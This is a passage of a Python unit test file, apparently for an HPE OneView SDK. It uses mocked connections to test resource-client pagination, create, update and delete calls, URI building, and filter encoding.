self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, "get")
def test_get_all_should_return_all_items_when_response_paginated(self, mock_get):
uri_list = ["/rest/testuri?start=0&count=-1",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=1"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}]}]
mock_get.side_effect = results
result = self.resource_client.get_all()
expected_items = [{'id': '1'}, {'id': '2'}, {'id': '3'}, {'id': '4'}, {'id': '5'}, {'id': '6'}, {'id': '7'}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, 'get')
def test_get_all_should_limit_results_to_requested_count_when_response_is_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=15',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=1']
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}]}]
mock_get.side_effect = results
result = self.resource_client.get_all(count=15)
expected_items = [{"id": "1"}, {"id": "2"}, {"id": "3"}, {"id": "4"}, {"id": "5"}, {"id": "6"}, {"id": "7"}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, "get")
def test_get_all_should_stop_requests_when_requested_count_reached(self, mock_get):
"""
In this case, the user provides a maximum number of results to be returned but for pagination purposes, a
nextPageUri is returned by OneView.
"""
uri_list = ["/rest/testuri?start=0&count=3",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=3"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}, {"id": "8"}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=3)
mock_get.assert_called_once_with(uri_list[0])
@mock.patch.object(connection, "get")
def test_get_all_should_stop_requests_when_next_page_is_equal_to_current_page(self, mock_get):
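# Guard against infinite loops: when the reported nextPageUri points back
# at the page that was just fetched, pagination should stop after one GET.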
uri = "/rest/testuri?start=0&count=-1"
members = [{"id": "1"}, {"id": "2"}, {"id": "3"}]
mock_get.return_value = {
"nextPageUri": uri,
"members": members,
"uri": uri
}
result = self.resource_client.get_all()
self.assertSequenceEqual(result, members)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_should_return_empty_list_when_response_has_no_items(self, mock_get):
mock_get.return_value = {"nextPageUri": None, "members": []}
result = self.resource_client.get_all()
self.assertEqual(result, [])
@mock.patch.object(connection, "get")
def test_get_all_should_return_empty_list_when_no_members(self, mock_get):
mock_get.return_value = {"nextPageUri": None, "members": None}
result = self.resource_client.get_all()
self.assertEqual(result, [])
@mock.patch.object(ResourceHelper, "do_get")
def test_refresh(self, mock_do_get):
updated_data = {"resource_name": "updated name"}
mock_do_get.return_value = updated_data
self.resource_client.refresh()
self.assertEqual(self.resource_client.data, updated_data)
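# The create/update tests below assume the stub resource is configured with
# version-keyed default values, so a 'type' matching the connection's API
# version is merged into payloads that do not set one explicitly.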
@mock.patch.object(connection, "post")
def test_create_uri(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
expected_dict = {"resource_name": "a name", "type": self.TYPE_V300}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_with_api_version_200(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client._merge_default_values()
expected_dict = {"resource_name": "a name", "type": self.TYPE_V200}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_with_default_api_version_300(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
expected_dict = {"resource_name": "a name", "type": self.TYPE_V300}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_should_not_override_resource_properties(self, mock_post):
dict_to_create = {"resource_name": "a name", "type": "anotherType"}
mock_post.return_value = {}, {}
expected = {"resource_name": "a name", "type": "anotherType"}
self.resource_client.create(dict_to_create)
mock_post.assert_called_once_with(self.URI, expected, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_without_default_values(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_with_custom_headers(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(connection, "post")
def test_create_should_return_new_resource_instance(self, mock_post):
mock_post.return_value = {}, {}
new_instance = self.resource_client.create({})
self.assertNotEqual(self.resource_client, new_instance)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_wait_for_activity_on_create(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, {}
mock_wait4task.return_value = self.task
self.resource_client.create({"test": "test"}, timeout=60)
mock_wait4task.assert_called_once_with(self.task, 60)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "delete")
def test_delete_should_return_true(self, mock_delete, mock_ensure_resource):
mock_delete.return_value = None, self.response_body
self.resource_client.data = {"uri": "/rest/testuri"}
result = self.resource_client.delete()
self.assertTrue(result)
@mock.patch.object(connection, 'delete')
def test_helper_delete_all_should_return_true(self, mock_delete):
mock_delete.return_value = None, self.response_body
filter = "name='Exchange Server'"
result = self.resource_helper.delete_all(filter=filter, force=True, timeout=-1)
self.assertTrue(result)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "delete")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_delete_with_force(self, mock_wait4task, mock_delete, mock_ensure_resource):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.data = {"uri": "/rest/testuri"}
self.resource_client.delete(force=True)
mock_delete.assert_called_once_with("/rest/testuri?force=True", custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "delete")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_delete_with_custom_headers(self, mock_wait4task, mock_delete, mock_ensure_resource):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.data = {"uri": "/rest/testuri"}
self.resource_client.delete(custom_headers=self.custom_headers)
mock_delete.assert_called_once_with(mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_uri_called_once(self, mock_put, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"name": "test", "type": "typeV300"}
self.resource_client.data = {'uri': uri}
expected = {"name": "test", "type": "typeV300", "uri": uri}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update)
self.assertEqual(self.response_body, self.resource_client.data)
mock_put.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_custom_headers(self, mock_put, mock_ensure_resource):
dict_to_update = {"name": "test"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, custom_headers=self.custom_headers)
mock_put.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_force(self, mock_put, mock_ensure_resource):
dict_to_update = {"name": "test"}
uri = "/rest/testuri"
expected = {"name": "test", "uri": uri, "type": "typeV300"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, force=True)
expected_uri = "/rest/testuri?force=True"
mock_put.assert_called_once_with(expected_uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_default_api_version_300(self, mock_put, mock_ensure_resource):
dict_to_update = {"name": "test"}
uri = "/rest/testuri"
mock_put.return_value = None, self.response_body
expected_dict = {"name": "test", "type": self.TYPE_V300, "uri": uri}
self.resource_client._merge_default_values()
self.resource_client.update(dict_to_update)
mock_put.assert_called_once_with(uri, expected_dict, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_should_not_override_resource_properties(self, mock_put, mock_ensure_resource):
dict_to_update = {"name": "test", "type": "anotherType"}
uri = "/rest/testuri"
mock_put.return_value = None, self.response_body
expected = {"name": "test", "type": "anotherType", "uri": uri}
self.resource_client.update(dict_to_update)
mock_put.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_without_default_values(self, mock_put, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"name": "test"}
expected = {"name": "test", "uri": uri, "type": "typeV300"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update)
mock_put.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_uri(self, mock_wait4task, mock_update, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"resource_data": "resource_data", "uri": uri}
expected = {"resource_data": "resource_data", "uri": uri, "type": "typeV300"}
mock_update.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.update(dict_to_update, False)
self.assertEqual(self.task, self.resource_client.data)
mock_update.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_return_entity(self, mock_wait4task, mock_put, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"resource_name": "a name", "uri": uri}
mock_put.return_value = self.task, {}
mock_wait4task.return_value = dict_to_update
self.resource_client.update(dict_to_update, timeout=-1)
self.assertEqual(self.resource_client.data, dict_to_update)
@mock.patch.object(Resource, "get_by")
def test_get_by_name_with_result(self, mock_get_by):
self.resource_client.get_by_name("Resource Name,")
mock_get_by.assert_called_once_with("name", "Resource Name,")
@mock.patch.object(Resource, "get_by")
def test_get_by_name_without_result(self, mock_get_by):
mock_get_by.return_value = []
response = self.resource_client.get_by_name("Resource Name,")
self.assertIsNone(response)
mock_get_by.assert_called_once_with("name", "Resource Name,")
@mock.patch.object(connection, "get")
def test_get_by_uri(self, mock_get):
self.resource_client.get_by_uri("/rest/testuri")
mock_get.assert_called_once_with('/rest/testuri')
@mock.patch.object(connection, "get")
def test_get_by_id_with_result(self, mock_get):
self.resource_client.get_by_id("123")
mock_get.assert_called_once_with("/rest/testuri/123")
@mock.patch.object(connection, "get")
def test_get_by_id_without_result(self, mock_get):
mock_get.return_value = []
response = self.resource_client.get_by_id("123")
self.assertIsNone(response)
mock_get.assert_called_once_with("/rest/testuri/123")
@mock.patch.object(connection, "get")
def test_get_collection_uri(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
self.resource_helper.get_collection()
mock_get.assert_called_once_with(self.URI)
@mock.patch.object(connection, "get")
def test_get_collection_with_filter(self, mock_get):
mock_get.return_value = {}
self.resource_helper.get_collection(filter="name=name")
mock_get.assert_called_once_with(self.URI + "?filter=name%3Dname")
@mock.patch.object(connection, "get")
def test_get_collection_with_path(self, mock_get):
mock_get.return_value = {}
self.resource_helper.get_collection(path="/test")
mock_get.assert_called_once_with(self.URI + "/test")
@mock.patch.object(connection, "get")
def test_get_collection_with_multiple_filters(self, mock_get):
mock_get.return_value = {}
self.resource_helper.get_collection(filter=["name1=one", "name2=two", "name=three"])
mock_get.assert_called_once_with(self.URI + "?filter=name1%3Done&filter=name2%3Dtwo&filter=name%3Dthree")
@mock.patch.object(connection, "get")
def test_get_collection_should_return_list(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
collection = self.resource_helper.get_collection()
self.assertEqual(len(collection), 2)
def test_build_uri_with_id_should_work(self):
input = "09USE7335NW35"
expected_output = "/rest/testuri/09USE7335NW35"
result = self.resource_client._helper.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_uri_should_work(self):
input = "/rest/testuri/09USE7335NW3"
expected_output = "/rest/testuri/09USE7335NW3"
result = self.resource_client._helper.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_none_should_raise_exception(self):
try:
self.resource_client._helper.build_uri(None)
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_empty_str_should_raise_exception(self):
try:
self.resource_client._helper.build_uri('')
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_different_resource_uri_should_raise_exception(self):
try:
self.resource_client._helper.build_uri(
"/rest/test/another/resource/uri/09USE7335NW3")
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_incomplete_uri_should_raise_exception(self):
try:
self.resource_client._helper.build_uri("/rest/")
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_subresource_uri(self):
options = [
dict(
resource="1",
subresource="2",
path="sub",
uri="/rest/testuri/1/sub/2"),
dict(
resource="/rest/testuri/3",
subresource="4",
path="sub",
uri="/rest/testuri/3/sub/4"),
dict(
resource="5",
subresource="/rest/testuri/5/sub/6",
path="sub",
uri="/rest/testuri/5/sub/6"),
dict(
resource="/rest/testuri/7",
subresource="/rest/testuri/7/sub/8",
path="sub",
uri="/rest/testuri/7/sub/8"),
dict(
resource=None,
subresource="/rest/testuri/9/sub/10",
path="sub",
uri="/rest/testuri/9/sub/10"),
dict(
resource="/rest/testuri/11",
subresource="12",
path="/sub/",
uri="/rest/testuri/11/sub/12"),
dict(
resource="/rest/testuri/13",
subresource=None,
path="/sub/",
uri="/rest/testuri/13/sub"),
]
for option in options:
uri = self.resource_client._helper.build_subresource_uri(option["resource"], option["subresource"], option["path"])
self.assertEqual(uri, option["uri"])
def test_build_subresource_uri_with_subresourceid_and_without_resource_should_fail(self):
try:
self.resource_client._helper.build_subresource_uri(None, "123456", "sub-path")
except exceptions.HPOneViewValueError as exception:
self.assertEqual(RESOURCE_ID_OR_URI_REQUIRED, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_merge_resources(self):
resource1 = {"name": "resource1", "type": "resource"}
resource2 = {"name": "resource2", "port": "1"}
expected_resource = {"name": "resource2", "type": "resource", "port": "1"}
merged_resource = merge_resources(resource1, resource2)
self.assertEqual(merged_resource, expected_resource)
def test_merge_default_values(self):
default_type = {"type": "type1"}
resource1 = {"name": "resource1"}
resource2 = {"name": "resource2"}
result_list = merge_default_values([resource1, resource2], default_type)
expected_list = [
{"name": "resource1", "type": "type1"},
{"name": "resource2", "type": "type1"}
]
self.assertEqual(result_list, expected_list)
def test_raise_unavailable_method_exception(self):
self.assertRaises(exceptions.HPOneViewUnavailableMethod,
unavailable_method)
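# FakeResource binds a ResourceClient to a different canonical URI so the
# tests can verify that URIs belonging to other resource types are rejected.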
class FakeResource(object):
def __init__(self, con):
self._connection = con
self._client = ResourceClient(con, "/rest/fake/resource")
def get_fake(self, uri):
return self._client.get(uri)
class ResourceClientTest(unittest.TestCase):
URI = "/rest/testuri"
TYPE_V200 = 'typeV200'
TYPE_V300 = 'typeV300'
DEFAULT_VALUES = {
'200': {'type': TYPE_V200},
'300': {'type': TYPE_V300}
}
def setUp(self):
super(ResourceClientTest, self).setUp()
self.host = '127.0.0.1'
self.connection = connection(self.host, 300)
self.resource_client = ResourceClient(self.connection, self.URI)
self.task = {"task": "task", "taskState": "Finished"}
self.response_body = {"body": "body"}
self.custom_headers = {'Accept-Language': 'en_US'}
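# The older ResourceClient interface mirrors much of the Resource/
# ResourceHelper behavior tested above; these tests additionally cover the
# view, fields, and scopeUris parameters, which are expected to be
# percent-encoded into the query string.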
@mock.patch.object(connection, 'get')
def test_get_all_called_once(self, mock_get):
filter = "'name'='OneViewSDK \"Test FC Network'"
sort = 'name:ascending'
query = "name NE 'WrongName'"
view = '"{view-name}"'
scope_uris = '/rest/scopes/cd237b60-09e2-45c4-829e-082e318a6d2a'
mock_get.return_value = {"members": [{"member": "member"}]}
result = self.resource_client.get_all(
1, 500, filter, query, sort, view, 'name,owner,modified', scope_uris=scope_uris)
uri = '{resource_uri}?start=1' \
'&count=500' \
'&filter=%27name%27%3D%27OneViewSDK%20%22Test%20FC%20Network%27' \
'&query=name%20NE%20%27WrongName%27' \
'&sort=name%3Aascending' \
'&view=%22%7Bview-name%7D%22' \
'&fields=name%2Cowner%2Cmodified' \
'&scopeUris=/rest/scopes/cd237b60-09e2-45c4-829e-082e318a6d2a'.format(resource_uri=self.URI)
self.assertEqual([{'member': 'member'}], result)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_defaults(self, mock_get):
self.resource_client.get_all()
uri = "{resource_uri}?start=0&count=-1".format(resource_uri=self.URI)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_custom_uri(self, mock_get):
self.resource_client.get_all(uri='/rest/testuri/12467836/subresources')
uri = "/rest/testuri/12467836/subresources?start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_custom_uri_and_query_string(self, mock_get):
self.resource_client.get_all(uri='/rest/testuri/12467836/subresources?param=value')
uri = "/rest/testuri/12467836/subresources?param=value&start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_different_resource_uri_should_fail(self, mock_get):
try:
self.resource_client.get_all(uri='/rest/other/resource/12467836/subresources')
except exceptions.HPOneViewUnknownType as e:
self.assertEqual(UNRECOGNIZED_URI, e.args[0])
else:
self.fail('Expected Exception was not raised')
@mock.patch.object(connection, 'get')
def test_get_all_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=-1',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=3']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}, {'id': '8'}]}]
mock_get.side_effect = results
self.resource_client.get_all()
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, 'get')
def test_get_all_with_count_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=15',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=3']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}, {'id': '8'}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=15)
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, 'get')
def test_get_all_should_return_all_items_when_response_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=-1',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=1']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}]}]
mock_get.side_effect = results
result = self.resource_client.get_all()
expected_items = [{'id': '1'}, {'id': '2'}, {'id': '3'}, {'id': '4'}, {'id': '5'}, {'id': '6'}, {'id': '7'}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, 'get')
def test_get_all_should_limit_results_to_requested_count_when_response_is_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=15',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=1']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}]}]
mock_get.side_effect = results
result = self.resource_client.get_all(count=15)
expected_items = [{'id': '1'}, {'id': '2'}, {'id': '3'}, {'id': '4'}, {'id': '5'}, {'id': '6'}, {'id': '7'}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, 'get')
def test_get_all_should_stop_requests_when_requested_count_reached(self, mock_get):
"""
In this case, the user provides a maximum number of results to be returned but for pagination purposes, a
nextPageUri is returned by OneView.
"""
uri_list = ['/rest/testuri?start=0&count=3',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=3']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}, {'id': '8'}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=3)
mock_get.assert_called_once_with(uri_list[0])
@mock.patch.object(connection, 'get')
def test_get_all_should_stop_requests_when_next_page_is_equal_to_current_page(self, mock_get):
uri = '/rest/testuri?start=0&count=-1'
members = [{'id': '1'}, {'id': '2'}, {'id': '3'}]
mock_get.return_value = {
'nextPageUri': uri,
'members': members,
'uri': uri
}
result = self.resource_client.get_all()
self.assertSequenceEqual(result, members)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_should_return_empty_list_when_response_has_no_items(self, mock_get):
mock_get.return_value = {'nextPageUri': None, 'members': []}
result = self.resource_client.get_all()
self.assertEqual(result, [])
@mock.patch.object(connection, 'get')
def test_get_all_should_return_empty_list_when_no_members(self, mock_get):
mock_get.return_value = {'nextPageUri': None, 'members': None}
result = self.resource_client.get_all()
self.assertEqual(result, [])
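# Deletes that return a task are expected to be handed to TaskMonitor;
# deletes that return no task should simply report success.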
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_all_called_once(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
filter = "name='Exchange Server'"
uri = "/rest/testuri?filter=name%3D%27Exchange%20Server%27&force=True"
self.resource_client.delete_all(filter=filter, force=True, timeout=-1)
mock_delete.assert_called_once_with(uri)
@mock.patch.object(connection, 'delete')
def test_delete_all_should_return_true(self, mock_delete):
mock_delete.return_value = None, self.response_body
filter = "name='Exchange Server'"
result = self.resource_client.delete_all(filter=filter, force=True, timeout=-1)
self.assertTrue(result)
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_all_should_wait_for_task(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
filter = "name='Exchange Server'"
delete_task = self.resource_client.delete_all(filter=filter, force=True, timeout=-1)
mock_wait4task.assert_called_with(self.task, timeout=-1)
self.assertEqual(self.task, delete_task)
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_by_id_called_once(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
delete_task = self.resource_client.delete('1', force=True, timeout=-1)
self.assertEqual(self.task, delete_task)
mock_delete.assert_called_once_with(self.URI + "/1?force=True", custom_headers=None)
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_with_custom_headers(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.delete('1', custom_headers=self.custom_headers)
mock_delete.assert_called_once_with(mock.ANY, custom_headers={'Accept-Language': 'en_US'})
def test_delete_dict_invalid_uri(self):
dict_to_delete = {"task": "task",
"uri": ""}
try:
self.resource_client.delete(dict_to_delete, False, -1)
except exceptions.HPOneViewUnknownType as e:
self.assertEqual("Unknown object type", e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'get')
def test_get_schema_uri(self, mock_get):
self.resource_client.get_schema()
mock_get.assert_called_once_with(self.URI + "/schema")
@mock.patch.object(connection, 'get')
def test_get_by_id_uri(self, mock_get):
self.resource_client.get('12345')
mock_get.assert_called_once_with(self.URI + "/12345")
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_name_with_result(self, mock_get_by):
mock_get_by.return_value = [{"name": "value"}]
response = self.resource_client.get_by_name('Resource Name,')
self.assertEqual(response, {"name": "value"})
mock_get_by.assert_called_once_with("name", 'Resource Name,')
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_name_without_result(self, mock_get_by):
mock_get_by.return_value = []
response = self.resource_client.get_by_name('Resource Name,')
self.assertIsNone(response)
mock_get_by.assert_called_once_with("name", 'Resource Name,')
@mock.patch.object(connection, 'get')
def test_get_collection_uri(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
self.resource_client.get_collection('12345')
mock_get.assert_called_once_with(self.URI + "/12345")
@mock.patch.object(connection, 'get')
def test_get_collection_with_filter(self, mock_get):
mock_get.return_value = {}
self.resource_client.get_collection('12345', 'name=name')
mock_get.assert_called_once_with(self.URI + "/12345?filter=name%3Dname")
@mock.patch.object(connection, 'get')
def test_get_collection_with_multiple_filters(self, mock_get):
mock_get.return_value = {}
self.resource_client.get_collection('12345', ['name1=one', 'name2=two', 'name=three'])
mock_get.assert_called_once_with(self.URI + "/12345?filter=name1%3Done&filter=name2%3Dtwo&filter=name%3Dthree")
@mock.patch.object(connection, 'get')
def test_get_collection_should_return_list(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
collection = self.resource_client.get_collection('12345')
self.assertEqual(len(collection), 2)
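# get_by filters server-side, but OneView matching can be case-insensitive;
# the client is expected to post-filter exact-but-case-insensitive 'name'
# matches (the "autofix" below) while leaving nested fields such as
# 'connection.name' untouched.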
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_property(self, mock_get_all):
self.resource_client.get_by('name', 'MyFibreNetwork')
mock_get_all.assert_called_once_with(filter="\"name='MyFibreNetwork'\"", uri='/rest/testuri')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_with_incorrect_result_autofix(self, mock_get_all):
mock_get_all.return_value = [{"name": "EXpected"},
{"name": "not expected"}]
response = self.resource_client.get_by('name', 'exPEcted')
self.assertEqual(response, [{"name": "EXpected"}])
mock_get_all.assert_called_once_with(filter="\"name='exPEcted'\"", uri='/rest/testuri')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_with_incorrect_result_skip_autofix(self, mock_get_all):
mock_get_all.return_value = [{"name": "expected"},
{"name": "not expected"}]
response = self.resource_client.get_by('connection.name', 'expected')
self.assertEqual(response, [{'name': 'expected'}, {'name': 'not expected'}])
mock_get_all.assert_called_once_with(filter="\"connection.name='expected'\"", uri='/rest/testuri')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_property_with_uri(self, mock_get_all):
self.resource_client.get_by('name', 'MyFibreNetwork', uri='/rest/testuri/5435534/sub')
mock_get_all.assert_called_once_with(filter="\"name='MyFibreNetwork'\"", uri='/rest/testuri/5435534/sub')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_property_with_invalid_uri(self, mock_get_all):
try:
self.resource_client.get_by('name', 'MyFibreNetwork', uri='/rest/other/5435534/sub')
except exceptions.HPOneViewUnknownType as e:
self.assertEqual('Unrecognized URI for this resource', e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_with_zero_body_called_once(self, mock_wait4task, mock_update):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.update_with_zero_body('/rest/enclosures/09USE133E5H4/configuration',
timeout=-1)
mock_update.assert_called_once_with(
"/rest/enclosures/09USE133E5H4/configuration", None, custom_headers=None)
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_with_zero_body_and_custom_headers(self, mock_wait4task, mock_update):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.update_with_zero_body('1', custom_headers=self.custom_headers)
mock_update.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_with_zero_body_return_entity(self, mock_wait4task, mock_put):
response_body = {"resource_name": "name"}
mock_put.return_value = self.task, self.task
